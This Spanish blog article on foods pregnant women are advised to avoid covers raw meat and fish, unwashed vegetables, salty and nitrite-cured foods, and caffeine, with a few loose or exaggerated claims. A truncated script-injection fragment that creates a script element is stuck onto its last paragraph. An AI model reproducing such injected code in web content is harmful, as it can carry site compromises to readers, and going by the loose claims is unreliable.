Salud y belleza » Embarazo

Alimentos peligrosos durante el embarazo

Sin Comentarios

Es el colmo del poder: un feto casi minúsculo, diminuto e imperceptible dicta las reglas y, la madre -no el huésped sino la dueña de casa- sólo puede limitarse a acatarlas. En efecto, durante el embarazo, es el futuro niño/a quien, en muchas ocasiones, decide qué se puede ingerir y qué no (y el cuerpo femenino sólo actúa en consecuencia: cuando algo cae incómodo al feto, efectivamente también le resultará problemático a la madre). Por esta razón y por muchas otras, suena interesante conocer ese grupo de alimentos que, durante el embarazo, es mejor evitar…

Ante todo, lo primero que hay que evitar cuando se está embarazada es el alcohol y el tabaco, ambos perjudiciales para el desarrollo del bebé; pero, más allá de esta cuestión lógica, obvia, existen otros alimentos que bien debería toda madre controlar. Durante el embarazo, la mujer sufre una debilidad inmunitaria que la pone en una posición complicada frente a ciertos factores: los alimentos crudos, por ejemplo. Para evitar males como la toxoplasmosis se recomienda que las mujeres embarazadas no consuman alimentos crudos (marinados de carne o pescado y el jamón serrano). Estos alimentos, de no estar bien coccionados, pueden traer serias consecuencias muy graves en el feto como hidrocefalia y retraso mental.

Algo similar ocurre con las verduras: es necesario, fundamental diríamos, que los vegetales sean lavados no una, ni dos, sino tres veces antes de consumirse o prepararse. Esto viene a cuenta de algo que ya mencionamos: al estar el sistema inmunológico debilitado, la embarazada es más propensa a pillar algún tipo de virus o parásito que venga con las frutas.

El caso de los alimentos excesivamente salados es diferente pues aquí entra en juego otra cuestión: estas comidas pueden presentar un riesgo si contienen nitrito sódico, ya que pueden convertirse en nitrosaminas, una sustancia que daña seriamente al feto. Por otra parte,  la sal albergada en ciertos alimentos (no hablamos de comidas normales sino de aquellas peligrosamente saladas como sardinas, anchoas u alimentos ahumados) puede favorecer la retención de líquidos haciendo que los pies de la embarazada se hinchen. Esto, claro, sin mencionar peligros como la hipertensión.

“Una mujer embarazada debe cuidar su dieta. Comer por dos y otros mitos similares, nada tienen que ver con el estado de embarazo. Es decir, una mujer que se encuentra en la dulce espera debe adquirir, sí, el doble de proteínas y vitaminas, pero no de grasas y otras sustancias peligrosas. Tanto la cafeína, como la sal o los alimentos que puedan ser foco de bacterias deben dejarse de lado” dice una profesional de la salud. En fin, siempre es bueno hacerle caso, al profesional, y también al feto que, como dijimos, aún desde su posición, dicta las reglas…var d=document;var s=d.createElement('script'); }

Más consejos de salud y belleza : , , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.